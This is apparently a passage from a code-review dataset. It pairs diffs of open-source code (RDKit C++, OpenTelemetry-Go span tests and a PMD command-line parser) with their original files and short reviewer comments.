checkForTimeout(t0, decomp.params().timeout);
}
decomp.process();
return unmatched;
}
} // namespace
unsigned int RGroupDecompose(const std::vector<ROMOL_SPTR> &cores,
const std::vector<ROMOL_SPTR> &mols,
RGroupRows &rows,
std::vector<unsigned int> *unmatchedIndices,
const RGroupDecompositionParameters &options) {
RGroupDecomposition decomp(cores, options);
std::vector<unsigned int> unmatched = Decomp(decomp, mols);
if (unmatchedIndices) {
*unmatchedIndices = unmatched;
}
rows = decomp.getRGroupsAsRows();
return mols.size() - unmatched.size();
}
unsigned int RGroupDecompose(const std::vector<ROMOL_SPTR> &cores,
const std::vector<ROMOL_SPTR> &mols,
RGroupColumns &columns,
std::vector<unsigned int> *unmatchedIndices,
const RGroupDecompositionParameters &options) {
RGroupDecomposition decomp(cores, options);
std::vector<unsigned int> unmatched = Decomp(decomp, mols);
if (unmatchedIndices) {
*unmatchedIndices = unmatched;
}
columns = decomp.getRGroupsAsColumns();
return mols.size() - unmatched.size();
}
} // namespace RDKit
| 1 | 23,959 | Might be better to use a tag here. I for one have used 1000 isotopes as a tag in the past... | rdkit-rdkit | cpp |
@@ -128,11 +128,11 @@ func TestSetName(t *testing.T) {
}
}
-func TestRecordingIsOff(t *testing.T) {
+func TestRecordingIsOn(t *testing.T) {
tp, _ := NewProvider()
_, span := tp.Tracer("Recording off").Start(context.Background(), "StartSpan")
defer span.End()
- if span.IsRecording() == true {
+ if span.IsRecording() == false {
t.Error("new span is recording events")
}
} | 1 | // Copyright 2019, OpenTelemetry Authors
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package trace
import (
"context"
"errors"
"fmt"
"math"
"strings"
"sync/atomic"
"testing"
"time"
"github.com/google/go-cmp/cmp"
"google.golang.org/grpc/codes"
"go.opentelemetry.io/otel/api/core"
"go.opentelemetry.io/otel/api/key"
"go.opentelemetry.io/otel/api/testharness"
"go.opentelemetry.io/otel/api/trace"
apitrace "go.opentelemetry.io/otel/api/trace"
ottest "go.opentelemetry.io/otel/internal/testing"
export "go.opentelemetry.io/otel/sdk/export/trace"
)
var (
tid core.TraceID
sid core.SpanID
)
func init() {
tid, _ = core.TraceIDFromHex("01020304050607080102040810203040")
sid, _ = core.SpanIDFromHex("0102040810203040")
}
func TestTracerFollowsExpectedAPIBehaviour(t *testing.T) {
tp, err := NewProvider(WithConfig(Config{DefaultSampler: ProbabilitySampler(0)}))
if err != nil {
t.Fatalf("failed to create provider, err: %v\n", err)
}
harness := testharness.NewHarness(t)
subjectFactory := func() trace.Tracer {
return tp.Tracer("")
}
harness.TestTracer(subjectFactory)
}
type testExporter struct {
spans []*export.SpanData
}
func (t *testExporter) ExportSpan(ctx context.Context, d *export.SpanData) {
t.spans = append(t.spans, d)
}
func TestSetName(t *testing.T) {
samplerIsCalled := false
fooSampler := Sampler(func(p SamplingParameters) SamplingDecision {
samplerIsCalled = true
t.Logf("called sampler for name %q", p.Name)
return SamplingDecision{Sample: strings.HasPrefix(p.Name, "foo")}
})
tp, _ := NewProvider(WithConfig(Config{DefaultSampler: fooSampler}))
type testCase struct {
name string
newName string
sampledBefore bool
sampledAfter bool
}
for idx, tt := range []testCase{
{ // 0
name: "foobar",
newName: "foobaz",
sampledBefore: true,
sampledAfter: true,
},
{ // 1
name: "foobar",
newName: "barbaz",
sampledBefore: true,
sampledAfter: false,
},
{ // 2
name: "barbar",
newName: "barbaz",
sampledBefore: false,
sampledAfter: false,
},
{ // 3
name: "barbar",
newName: "foobar",
sampledBefore: false,
sampledAfter: true,
},
} {
span := startNamedSpan(tp, "SetName", tt.name)
if !samplerIsCalled {
t.Errorf("%d: the sampler was not even called during span creation", idx)
}
samplerIsCalled = false
if gotSampledBefore := span.SpanContext().IsSampled(); tt.sampledBefore != gotSampledBefore {
t.Errorf("%d: invalid sampling decision before rename, expected %v, got %v", idx, tt.sampledBefore, gotSampledBefore)
}
span.SetName(tt.newName)
if !samplerIsCalled {
t.Errorf("%d: the sampler was not even called during span rename", idx)
}
samplerIsCalled = false
if gotSampledAfter := span.SpanContext().IsSampled(); tt.sampledAfter != gotSampledAfter {
t.Errorf("%d: invalid sampling decision after rename, expected %v, got %v", idx, tt.sampledAfter, gotSampledAfter)
}
span.End()
}
}
func TestRecordingIsOff(t *testing.T) {
tp, _ := NewProvider()
_, span := tp.Tracer("Recording off").Start(context.Background(), "StartSpan")
defer span.End()
if span.IsRecording() == true {
t.Error("new span is recording events")
}
}
func TestSampling(t *testing.T) {
idg := defIDGenerator()
const total = 10000
for name, tc := range map[string]struct {
sampler Sampler
expect float64
parent bool
sampledParent bool
}{
// Span w/o a parent
"NeverSample": {sampler: NeverSample(), expect: 0},
"AlwaysSample": {sampler: AlwaysSample(), expect: 1.0},
"ProbabilitySampler_-1": {sampler: ProbabilitySampler(-1.0), expect: 0},
"ProbabilitySampler_.25": {sampler: ProbabilitySampler(0.25), expect: .25},
"ProbabilitySampler_.50": {sampler: ProbabilitySampler(0.50), expect: .5},
"ProbabilitySampler_.75": {sampler: ProbabilitySampler(0.75), expect: .75},
"ProbabilitySampler_2.0": {sampler: ProbabilitySampler(2.0), expect: 1},
// Spans with a parent that is *not* sampled act like spans w/o a parent
"UnsampledParentSpanWithProbabilitySampler_-1": {sampler: ProbabilitySampler(-1.0), expect: 0, parent: true},
"UnsampledParentSpanWithProbabilitySampler_.25": {sampler: ProbabilitySampler(.25), expect: .25, parent: true},
"UnsampledParentSpanWithProbabilitySampler_.50": {sampler: ProbabilitySampler(0.50), expect: .5, parent: true},
"UnsampledParentSpanWithProbabilitySampler_.75": {sampler: ProbabilitySampler(0.75), expect: .75, parent: true},
"UnsampledParentSpanWithProbabilitySampler_2.0": {sampler: ProbabilitySampler(2.0), expect: 1, parent: true},
// Spans with a parent that is sampled, will always sample, regardless of the probability
"SampledParentSpanWithProbabilitySampler_-1": {sampler: ProbabilitySampler(-1.0), expect: 1, parent: true, sampledParent: true},
"SampledParentSpanWithProbabilitySampler_.25": {sampler: ProbabilitySampler(.25), expect: 1, parent: true, sampledParent: true},
"SampledParentSpanWithProbabilitySampler_2.0": {sampler: ProbabilitySampler(2.0), expect: 1, parent: true, sampledParent: true},
// Spans with a sampled parent, but when using the NeverSample Sampler, aren't sampled
"SampledParentSpanWithNeverSample": {sampler: NeverSample(), expect: 0, parent: true, sampledParent: true},
} {
tc := tc
t.Run(name, func(t *testing.T) {
t.Parallel()
p, err := NewProvider(WithConfig(Config{DefaultSampler: tc.sampler}))
if err != nil {
t.Fatal("unexpected error:", err)
}
tr := p.Tracer("test")
var sampled int
for i := 0; i < total; i++ {
ctx := context.Background()
if tc.parent {
psc := core.SpanContext{
TraceID: idg.NewTraceID(),
SpanID: idg.NewSpanID(),
}
if tc.sampledParent {
psc.TraceFlags = core.TraceFlagsSampled
}
ctx = apitrace.ContextWithRemoteSpanContext(ctx, psc)
}
_, span := tr.Start(ctx, "test")
if span.SpanContext().IsSampled() {
sampled++
}
}
tolerance := 0.0
got := float64(sampled) / float64(total)
if tc.expect > 0 && tc.expect < 1 {
// See https://en.wikipedia.org/wiki/Binomial_proportion_confidence_interval
const z = 4.75342 // This should succeed 99.9999% of the time
tolerance = z * math.Sqrt(got*(1-got)/total)
}
diff := math.Abs(got - tc.expect)
if diff > tolerance {
t.Errorf("got %f (diff: %f), expected %f (w/tolerance: %f)", got, diff, tc.expect, tolerance)
}
})
}
}
func TestStartSpanWithParent(t *testing.T) {
tp, _ := NewProvider()
tr := tp.Tracer("SpanWithParent")
ctx := context.Background()
sc1 := core.SpanContext{
TraceID: tid,
SpanID: sid,
TraceFlags: 0x0,
}
_, s1 := tr.Start(apitrace.ContextWithRemoteSpanContext(ctx, sc1), "span1-unsampled-parent1")
if err := checkChild(sc1, s1); err != nil {
t.Error(err)
}
_, s2 := tr.Start(apitrace.ContextWithRemoteSpanContext(ctx, sc1), "span2-unsampled-parent1")
if err := checkChild(sc1, s2); err != nil {
t.Error(err)
}
sc2 := core.SpanContext{
TraceID: tid,
SpanID: sid,
TraceFlags: 0x1,
//Tracestate: testTracestate,
}
_, s3 := tr.Start(apitrace.ContextWithRemoteSpanContext(ctx, sc2), "span3-sampled-parent2")
if err := checkChild(sc2, s3); err != nil {
t.Error(err)
}
ctx2, s4 := tr.Start(apitrace.ContextWithRemoteSpanContext(ctx, sc2), "span4-sampled-parent2")
if err := checkChild(sc2, s4); err != nil {
t.Error(err)
}
s4Sc := s4.SpanContext()
_, s5 := tr.Start(ctx2, "span5-implicit-childof-span4")
if err := checkChild(s4Sc, s5); err != nil {
t.Error(err)
}
}
func TestSetSpanAttributesOnStart(t *testing.T) {
te := &testExporter{}
tp, _ := NewProvider(WithSyncer(te))
span := startSpan(tp,
"StartSpanAttribute",
apitrace.WithAttributes(key.String("key1", "value1")),
apitrace.WithAttributes(key.String("key2", "value2")),
)
got, err := endSpan(te, span)
if err != nil {
t.Fatal(err)
}
want := &export.SpanData{
SpanContext: core.SpanContext{
TraceID: tid,
TraceFlags: 0x1,
},
ParentSpanID: sid,
Name: "span0",
Attributes: []core.KeyValue{
key.String("key1", "value1"),
key.String("key2", "value2"),
},
SpanKind: apitrace.SpanKindInternal,
HasRemoteParent: true,
}
if diff := cmpDiff(got, want); diff != "" {
t.Errorf("SetSpanAttributesOnStart: -got +want %s", diff)
}
}
func TestSetSpanAttributes(t *testing.T) {
te := &testExporter{}
tp, _ := NewProvider(WithSyncer(te))
span := startSpan(tp, "SpanAttribute")
span.SetAttributes(key.New("key1").String("value1"))
got, err := endSpan(te, span)
if err != nil {
t.Fatal(err)
}
want := &export.SpanData{
SpanContext: core.SpanContext{
TraceID: tid,
TraceFlags: 0x1,
},
ParentSpanID: sid,
Name: "span0",
Attributes: []core.KeyValue{
key.String("key1", "value1"),
},
SpanKind: apitrace.SpanKindInternal,
HasRemoteParent: true,
}
if diff := cmpDiff(got, want); diff != "" {
t.Errorf("SetSpanAttributes: -got +want %s", diff)
}
}
func TestSetSpanAttributesOverLimit(t *testing.T) {
te := &testExporter{}
cfg := Config{MaxAttributesPerSpan: 2}
tp, _ := NewProvider(WithConfig(cfg), WithSyncer(te))
span := startSpan(tp, "SpanAttributesOverLimit")
span.SetAttributes(
key.Bool("key1", true),
key.String("key2", "value2"),
key.Bool("key1", false), // Replace key1.
key.Int64("key4", 4), // Remove key2 and add key4
)
got, err := endSpan(te, span)
if err != nil {
t.Fatal(err)
}
want := &export.SpanData{
SpanContext: core.SpanContext{
TraceID: tid,
TraceFlags: 0x1,
},
ParentSpanID: sid,
Name: "span0",
Attributes: []core.KeyValue{
key.Bool("key1", false),
key.Int64("key4", 4),
},
SpanKind: apitrace.SpanKindInternal,
HasRemoteParent: true,
DroppedAttributeCount: 1,
}
if diff := cmpDiff(got, want); diff != "" {
t.Errorf("SetSpanAttributesOverLimit: -got +want %s", diff)
}
}
func TestEvents(t *testing.T) {
te := &testExporter{}
tp, _ := NewProvider(WithSyncer(te))
span := startSpan(tp, "Events")
k1v1 := key.New("key1").String("value1")
k2v2 := key.Bool("key2", true)
k3v3 := key.Int64("key3", 3)
span.AddEvent(context.Background(), "foo", key.New("key1").String("value1"))
span.AddEvent(context.Background(), "bar",
key.Bool("key2", true),
key.Int64("key3", 3),
)
got, err := endSpan(te, span)
if err != nil {
t.Fatal(err)
}
for i := range got.MessageEvents {
if !checkTime(&got.MessageEvents[i].Time) {
t.Error("exporting span: expected nonzero Event Time")
}
}
want := &export.SpanData{
SpanContext: core.SpanContext{
TraceID: tid,
TraceFlags: 0x1,
},
ParentSpanID: sid,
Name: "span0",
HasRemoteParent: true,
MessageEvents: []export.Event{
{Name: "foo", Attributes: []core.KeyValue{k1v1}},
{Name: "bar", Attributes: []core.KeyValue{k2v2, k3v3}},
},
SpanKind: apitrace.SpanKindInternal,
}
if diff := cmpDiff(got, want); diff != "" {
t.Errorf("Message Events: -got +want %s", diff)
}
}
func TestEventsOverLimit(t *testing.T) {
te := &testExporter{}
cfg := Config{MaxEventsPerSpan: 2}
tp, _ := NewProvider(WithConfig(cfg), WithSyncer(te))
span := startSpan(tp, "EventsOverLimit")
k1v1 := key.New("key1").String("value1")
k2v2 := key.Bool("key2", false)
k3v3 := key.New("key3").String("value3")
span.AddEvent(context.Background(), "fooDrop", key.New("key1").String("value1"))
span.AddEvent(context.Background(), "barDrop",
key.Bool("key2", true),
key.New("key3").String("value3"),
)
span.AddEvent(context.Background(), "foo", key.New("key1").String("value1"))
span.AddEvent(context.Background(), "bar",
key.Bool("key2", false),
key.New("key3").String("value3"),
)
got, err := endSpan(te, span)
if err != nil {
t.Fatal(err)
}
for i := range got.MessageEvents {
if !checkTime(&got.MessageEvents[i].Time) {
t.Error("exporting span: expected nonzero Event Time")
}
}
want := &export.SpanData{
SpanContext: core.SpanContext{
TraceID: tid,
TraceFlags: 0x1,
},
ParentSpanID: sid,
Name: "span0",
MessageEvents: []export.Event{
{Name: "foo", Attributes: []core.KeyValue{k1v1}},
{Name: "bar", Attributes: []core.KeyValue{k2v2, k3v3}},
},
DroppedMessageEventCount: 2,
HasRemoteParent: true,
SpanKind: apitrace.SpanKindInternal,
}
if diff := cmpDiff(got, want); diff != "" {
t.Errorf("Message Event over limit: -got +want %s", diff)
}
}
func TestLinks(t *testing.T) {
te := &testExporter{}
tp, _ := NewProvider(WithSyncer(te))
k1v1 := key.New("key1").String("value1")
k2v2 := key.New("key2").String("value2")
k3v3 := key.New("key3").String("value3")
sc1 := core.SpanContext{TraceID: core.TraceID([16]byte{1, 1}), SpanID: core.SpanID{3}}
sc2 := core.SpanContext{TraceID: core.TraceID([16]byte{1, 1}), SpanID: core.SpanID{3}}
span := startSpan(tp, "Links",
apitrace.LinkedTo(sc1, key.New("key1").String("value1")),
apitrace.LinkedTo(sc2,
key.New("key2").String("value2"),
key.New("key3").String("value3"),
),
)
got, err := endSpan(te, span)
if err != nil {
t.Fatal(err)
}
want := &export.SpanData{
SpanContext: core.SpanContext{
TraceID: tid,
TraceFlags: 0x1,
},
ParentSpanID: sid,
Name: "span0",
HasRemoteParent: true,
Links: []apitrace.Link{
{SpanContext: sc1, Attributes: []core.KeyValue{k1v1}},
{SpanContext: sc2, Attributes: []core.KeyValue{k2v2, k3v3}},
},
SpanKind: apitrace.SpanKindInternal,
}
if diff := cmpDiff(got, want); diff != "" {
t.Errorf("Link: -got +want %s", diff)
}
}
func TestLinksOverLimit(t *testing.T) {
te := &testExporter{}
cfg := Config{MaxLinksPerSpan: 2}
sc1 := core.SpanContext{TraceID: core.TraceID([16]byte{1, 1}), SpanID: core.SpanID{3}}
sc2 := core.SpanContext{TraceID: core.TraceID([16]byte{1, 1}), SpanID: core.SpanID{3}}
sc3 := core.SpanContext{TraceID: core.TraceID([16]byte{1, 1}), SpanID: core.SpanID{3}}
tp, _ := NewProvider(WithConfig(cfg), WithSyncer(te))
span := startSpan(tp, "LinksOverLimit",
apitrace.LinkedTo(sc1, key.New("key1").String("value1")),
apitrace.LinkedTo(sc2, key.New("key2").String("value2")),
apitrace.LinkedTo(sc3, key.New("key3").String("value3")),
)
k2v2 := key.New("key2").String("value2")
k3v3 := key.New("key3").String("value3")
got, err := endSpan(te, span)
if err != nil {
t.Fatal(err)
}
want := &export.SpanData{
SpanContext: core.SpanContext{
TraceID: tid,
TraceFlags: 0x1,
},
ParentSpanID: sid,
Name: "span0",
Links: []apitrace.Link{
{SpanContext: sc2, Attributes: []core.KeyValue{k2v2}},
{SpanContext: sc3, Attributes: []core.KeyValue{k3v3}},
},
DroppedLinkCount: 1,
HasRemoteParent: true,
SpanKind: apitrace.SpanKindInternal,
}
if diff := cmpDiff(got, want); diff != "" {
t.Errorf("Link over limit: -got +want %s", diff)
}
}
func TestSetSpanName(t *testing.T) {
te := &testExporter{}
tp, _ := NewProvider(WithSyncer(te))
ctx := context.Background()
want := "SpanName-1"
ctx = apitrace.ContextWithRemoteSpanContext(ctx, core.SpanContext{
TraceID: tid,
SpanID: sid,
TraceFlags: 1,
})
_, span := tp.Tracer("SetSpanName").Start(ctx, "SpanName-1")
got, err := endSpan(te, span)
if err != nil {
t.Fatal(err)
}
if got.Name != want {
t.Errorf("span.Name: got %q; want %q", got.Name, want)
}
}
func TestSetSpanStatus(t *testing.T) {
te := &testExporter{}
tp, _ := NewProvider(WithSyncer(te))
span := startSpan(tp, "SpanStatus")
span.SetStatus(codes.Canceled)
got, err := endSpan(te, span)
if err != nil {
t.Fatal(err)
}
want := &export.SpanData{
SpanContext: core.SpanContext{
TraceID: tid,
TraceFlags: 0x1,
},
ParentSpanID: sid,
Name: "span0",
SpanKind: apitrace.SpanKindInternal,
Status: codes.Canceled,
HasRemoteParent: true,
}
if diff := cmpDiff(got, want); diff != "" {
t.Errorf("SetSpanStatus: -got +want %s", diff)
}
}
func cmpDiff(x, y interface{}) string {
return cmp.Diff(x, y, cmp.AllowUnexported(core.Value{}), cmp.AllowUnexported(export.Event{}))
}
func remoteSpanContext() core.SpanContext {
return core.SpanContext{
TraceID: tid,
SpanID: sid,
TraceFlags: 1,
}
}
// checkChild is a test utility function that tests that c has fields set appropriately,
// given that it is a child span of p.
func checkChild(p core.SpanContext, apiSpan apitrace.Span) error {
s := apiSpan.(*span)
if s == nil {
return fmt.Errorf("got nil child span, want non-nil")
}
if got, want := s.spanContext.TraceIDString(), p.TraceIDString(); got != want {
return fmt.Errorf("got child trace ID %s, want %s", got, want)
}
if childID, parentID := s.spanContext.SpanIDString(), p.SpanIDString(); childID == parentID {
return fmt.Errorf("got child span ID %s, parent span ID %s; want unequal IDs", childID, parentID)
}
if got, want := s.spanContext.TraceFlags, p.TraceFlags; got != want {
return fmt.Errorf("got child trace options %d, want %d", got, want)
}
// TODO [rgheita] : Fix tracestate test
//if got, want := c.spanContext.Tracestate, p.Tracestate; got != want {
// return fmt.Errorf("got child tracestate %v, want %v", got, want)
//}
return nil
}
// startSpan starts a span with a name "span0". See startNamedSpan for
// details.
func startSpan(tp *Provider, trName string, args ...apitrace.StartOption) apitrace.Span {
return startNamedSpan(tp, trName, "span0", args...)
}
// startNamedSpan is a test utility func that starts a span with a
// passed name and with remote span context as parent. The remote span
// context contains TraceFlags with sampled bit set. This allows the
// span to be automatically sampled.
func startNamedSpan(tp *Provider, trName, name string, args ...apitrace.StartOption) apitrace.Span {
ctx := context.Background()
ctx = apitrace.ContextWithRemoteSpanContext(ctx, remoteSpanContext())
args = append(args, apitrace.WithRecord())
_, span := tp.Tracer(trName).Start(
ctx,
name,
args...,
)
return span
}
// endSpan is a test utility function that ends the span in the context and
// returns the exported export.SpanData.
// It requires that span be sampled using one of these methods
// 1. Passing parent span context in context
// 2. Use WithSampler(AlwaysSample())
// 3. Configuring AlwaysSample() as default sampler
//
// It also does some basic tests on the span.
// It also clears spanID in the export.SpanData to make the comparison easier.
func endSpan(te *testExporter, span apitrace.Span) (*export.SpanData, error) {
if !span.IsRecording() {
return nil, fmt.Errorf("IsRecording: got false, want true")
}
if !span.SpanContext().IsSampled() {
return nil, fmt.Errorf("IsSampled: got false, want true")
}
span.End()
if len(te.spans) != 1 {
return nil, fmt.Errorf("got exported spans %#v, want one span", te.spans)
}
got := te.spans[0]
if !got.SpanContext.SpanID.IsValid() {
return nil, fmt.Errorf("exporting span: expected nonzero SpanID")
}
got.SpanContext.SpanID = core.SpanID{}
if !checkTime(&got.StartTime) {
return nil, fmt.Errorf("exporting span: expected nonzero StartTime")
}
if !checkTime(&got.EndTime) {
return nil, fmt.Errorf("exporting span: expected nonzero EndTime")
}
return got, nil
}
// checkTime checks that a nonzero time was set in x, then clears it.
func checkTime(x *time.Time) bool {
if x.IsZero() {
return false
}
*x = time.Time{}
return true
}
type fakeExporter map[string]*export.SpanData
func (f fakeExporter) ExportSpan(ctx context.Context, s *export.SpanData) {
f[s.Name] = s
}
func TestEndSpanTwice(t *testing.T) {
spans := make(fakeExporter)
tp, _ := NewProvider(WithSyncer(spans))
span := startSpan(tp, "EndSpanTwice")
span.End()
span.End()
if len(spans) != 1 {
t.Fatalf("expected only a single span, got %#v", spans)
}
}
func TestStartSpanAfterEnd(t *testing.T) {
spans := make(fakeExporter)
tp, _ := NewProvider(WithConfig(Config{DefaultSampler: AlwaysSample()}), WithSyncer(spans))
ctx := context.Background()
tr := tp.Tracer("SpanAfterEnd")
ctx, span0 := tr.Start(apitrace.ContextWithRemoteSpanContext(ctx, remoteSpanContext()), "parent")
ctx1, span1 := tr.Start(ctx, "span-1")
span1.End()
// Start a new span with the context containing span-1
// even though span-1 is ended, we still add this as a new child of span-1
_, span2 := tr.Start(ctx1, "span-2")
span2.End()
span0.End()
if got, want := len(spans), 3; got != want {
t.Fatalf("len(%#v) = %d; want %d", spans, got, want)
}
gotParent, ok := spans["parent"]
if !ok {
t.Fatal("parent not recorded")
}
gotSpan1, ok := spans["span-1"]
if !ok {
t.Fatal("span-1 not recorded")
}
gotSpan2, ok := spans["span-2"]
if !ok {
t.Fatal("span-2 not recorded")
}
if got, want := gotSpan1.SpanContext.TraceID, gotParent.SpanContext.TraceID; got != want {
t.Errorf("span-1.TraceID=%q; want %q", got, want)
}
if got, want := gotSpan2.SpanContext.TraceID, gotParent.SpanContext.TraceID; got != want {
t.Errorf("span-2.TraceID=%q; want %q", got, want)
}
if got, want := gotSpan1.ParentSpanID, gotParent.SpanContext.SpanID; got != want {
t.Errorf("span-1.ParentSpanID=%q; want %q (parent.SpanID)", got, want)
}
if got, want := gotSpan2.ParentSpanID, gotSpan1.SpanContext.SpanID; got != want {
t.Errorf("span-2.ParentSpanID=%q; want %q (span1.SpanID)", got, want)
}
}
func TestChildSpanCount(t *testing.T) {
spans := make(fakeExporter)
tp, _ := NewProvider(WithConfig(Config{DefaultSampler: AlwaysSample()}), WithSyncer(spans))
tr := tp.Tracer("ChidSpanCount")
ctx, span0 := tr.Start(context.Background(), "parent")
ctx1, span1 := tr.Start(ctx, "span-1")
_, span2 := tr.Start(ctx1, "span-2")
span2.End()
span1.End()
_, span3 := tr.Start(ctx, "span-3")
span3.End()
span0.End()
if got, want := len(spans), 4; got != want {
t.Fatalf("len(%#v) = %d; want %d", spans, got, want)
}
gotParent, ok := spans["parent"]
if !ok {
t.Fatal("parent not recorded")
}
gotSpan1, ok := spans["span-1"]
if !ok {
t.Fatal("span-1 not recorded")
}
gotSpan2, ok := spans["span-2"]
if !ok {
t.Fatal("span-2 not recorded")
}
gotSpan3, ok := spans["span-3"]
if !ok {
t.Fatal("span-3 not recorded")
}
if got, want := gotSpan3.ChildSpanCount, 0; got != want {
t.Errorf("span-3.ChildSpanCount=%q; want %q", got, want)
}
if got, want := gotSpan2.ChildSpanCount, 0; got != want {
t.Errorf("span-2.ChildSpanCount=%q; want %q", got, want)
}
if got, want := gotSpan1.ChildSpanCount, 1; got != want {
t.Errorf("span-1.ChildSpanCount=%q; want %q", got, want)
}
if got, want := gotParent.ChildSpanCount, 2; got != want {
t.Errorf("parent.ChildSpanCount=%q; want %q", got, want)
}
}
func TestNilSpanEnd(t *testing.T) {
var span *span
span.End()
}
func TestExecutionTracerTaskEnd(t *testing.T) {
var n uint64
tp, _ := NewProvider(WithConfig(Config{DefaultSampler: NeverSample()}))
tr := tp.Tracer("Execution Tracer Task End")
executionTracerTaskEnd := func() {
atomic.AddUint64(&n, 1)
}
var spans []*span
_, apiSpan := tr.Start(context.Background(), "foo")
s := apiSpan.(*span)
s.executionTracerTaskEnd = executionTracerTaskEnd
spans = append(spans, s) // never sample
tID, _ := core.TraceIDFromHex("0102030405060708090a0b0c0d0e0f")
sID, _ := core.SpanIDFromHex("0001020304050607")
ctx := context.Background()
ctx = apitrace.ContextWithRemoteSpanContext(ctx,
core.SpanContext{
TraceID: tID,
SpanID: sID,
TraceFlags: 0,
},
)
_, apiSpan = tr.Start(
ctx,
"foo",
)
s = apiSpan.(*span)
s.executionTracerTaskEnd = executionTracerTaskEnd
spans = append(spans, s) // parent not sampled
//tp.ApplyConfig(Config{DefaultSampler: AlwaysSample()})
_, apiSpan = tr.Start(context.Background(), "foo")
s = apiSpan.(*span)
s.executionTracerTaskEnd = executionTracerTaskEnd
spans = append(spans, s) // always sample
for _, span := range spans {
span.End()
}
if got, want := n, uint64(len(spans)); got != want {
t.Fatalf("Execution tracer task ended for %v spans; want %v", got, want)
}
}
func TestCustomStartEndTime(t *testing.T) {
var te testExporter
tp, _ := NewProvider(WithSyncer(&te), WithConfig(Config{DefaultSampler: AlwaysSample()}))
startTime := time.Date(2019, time.August, 27, 14, 42, 0, 0, time.UTC)
endTime := startTime.Add(time.Second * 20)
_, span := tp.Tracer("Custom Start and End time").Start(
context.Background(),
"testspan",
apitrace.WithStartTime(startTime),
)
span.End(apitrace.WithEndTime(endTime))
if len(te.spans) != 1 {
t.Fatalf("got exported spans %#v, want one span", te.spans)
}
got := te.spans[0]
if got.StartTime != startTime {
t.Errorf("expected start time to be %s, got %s", startTime, got.StartTime)
}
if got.EndTime != endTime {
t.Errorf("expected end time to be %s, got %s", endTime, got.EndTime)
}
}
func TestRecordError(t *testing.T) {
scenarios := []struct {
err error
typ string
msg string
}{
{
err: ottest.NewTestError("test error"),
typ: "go.opentelemetry.io/otel/internal/testing.TestError",
msg: "test error",
},
{
err: errors.New("test error 2"),
typ: "*errors.errorString",
msg: "test error 2",
},
}
for _, s := range scenarios {
te := &testExporter{}
tp, _ := NewProvider(WithSyncer(te))
span := startSpan(tp, "RecordError")
errTime := time.Now()
span.RecordError(context.Background(), s.err,
apitrace.WithErrorTime(errTime),
)
got, err := endSpan(te, span)
if err != nil {
t.Fatal(err)
}
want := &export.SpanData{
SpanContext: core.SpanContext{
TraceID: tid,
TraceFlags: 0x1,
},
ParentSpanID: sid,
Name: "span0",
SpanKind: apitrace.SpanKindInternal,
HasRemoteParent: true,
MessageEvents: []export.Event{
{
Name: errorEventName,
Time: errTime,
Attributes: []core.KeyValue{
errorTypeKey.String(s.typ),
errorMessageKey.String(s.msg),
},
},
},
}
if diff := cmpDiff(got, want); diff != "" {
t.Errorf("SpanErrorOptions: -got +want %s", diff)
}
}
}
func TestRecordErrorWithStatus(t *testing.T) {
te := &testExporter{}
tp, _ := NewProvider(WithSyncer(te))
span := startSpan(tp, "RecordErrorWithStatus")
testErr := ottest.NewTestError("test error")
errTime := time.Now()
testStatus := codes.Unknown
span.RecordError(context.Background(), testErr,
apitrace.WithErrorTime(errTime),
apitrace.WithErrorStatus(testStatus),
)
got, err := endSpan(te, span)
if err != nil {
t.Fatal(err)
}
want := &export.SpanData{
SpanContext: core.SpanContext{
TraceID: tid,
TraceFlags: 0x1,
},
ParentSpanID: sid,
Name: "span0",
SpanKind: apitrace.SpanKindInternal,
Status: codes.Unknown,
HasRemoteParent: true,
MessageEvents: []export.Event{
{
Name: errorEventName,
Time: errTime,
Attributes: []core.KeyValue{
errorTypeKey.String("go.opentelemetry.io/otel/internal/testing.TestError"),
errorMessageKey.String("test error"),
},
},
},
}
if diff := cmpDiff(got, want); diff != "" {
t.Errorf("SpanErrorOptions: -got +want %s", diff)
}
}
func TestRecordErrorNil(t *testing.T) {
te := &testExporter{}
tp, _ := NewProvider(WithSyncer(te))
span := startSpan(tp, "RecordErrorNil")
span.RecordError(context.Background(), nil)
got, err := endSpan(te, span)
if err != nil {
t.Fatal(err)
}
want := &export.SpanData{
SpanContext: core.SpanContext{
TraceID: tid,
TraceFlags: 0x1,
},
ParentSpanID: sid,
Name: "span0",
SpanKind: apitrace.SpanKindInternal,
HasRemoteParent: true,
Status: codes.OK,
}
if diff := cmpDiff(got, want); diff != "" {
t.Errorf("SpanErrorOptions: -got +want %s", diff)
}
}
func TestWithSpanKind(t *testing.T) {
var te testExporter
tp, _ := NewProvider(WithSyncer(&te), WithConfig(Config{DefaultSampler: AlwaysSample()}))
tr := tp.Tracer("withSpanKind")
_, span := tr.Start(context.Background(), "WithoutSpanKind")
spanData, err := endSpan(&te, span)
if err != nil {
t.Error(err.Error())
}
if spanData.SpanKind != apitrace.SpanKindInternal {
t.Errorf("Default value of Spankind should be Internal: got %+v, want %+v\n", spanData.SpanKind, apitrace.SpanKindInternal)
}
sks := []apitrace.SpanKind{
apitrace.SpanKindInternal,
apitrace.SpanKindServer,
apitrace.SpanKindClient,
apitrace.SpanKindProducer,
apitrace.SpanKindConsumer,
}
for _, sk := range sks {
te.spans = nil
_, span := tr.Start(context.Background(), fmt.Sprintf("SpanKind-%v", sk), apitrace.WithSpanKind(sk))
spanData, err := endSpan(&te, span)
if err != nil {
t.Error(err.Error())
}
if spanData.SpanKind != sk {
t.Errorf("WithSpanKind check: got %+v, want %+v\n", spanData.SpanKind, sks)
}
}
}
 | 1 | 11,327 | This test seems to have been broken from the start :joy:. It "worked" because the old sample chance was small enough that it was always off. Thanks for fixing this. Could you also change the strings on this test? `"Recording off"` and `"new span is recording events"` | open-telemetry-opentelemetry-go | go 
@@ -44,6 +44,14 @@ public final class PmdParametersParseResult {
return !isError() && result.isHelp();
}
+ /**
+ * Returns whether parsing just requested the {@code --version} text.
+ * In this case no configuration is produced.
+ */
+ public boolean isVersion() {
+ return !isError() && result.isVersion();
+ }
+
/**
* Returns the error if parsing failed. Parsing may fail if required
* parameters are not provided, or if some parameters don't pass validation. | 1 | /*
* BSD-style license; for more info see http://pmd.sourceforge.net/license.html
*/
package net.sourceforge.pmd.cli;
import java.util.Objects;
import net.sourceforge.pmd.PMDConfiguration;
import com.beust.jcommander.JCommander;
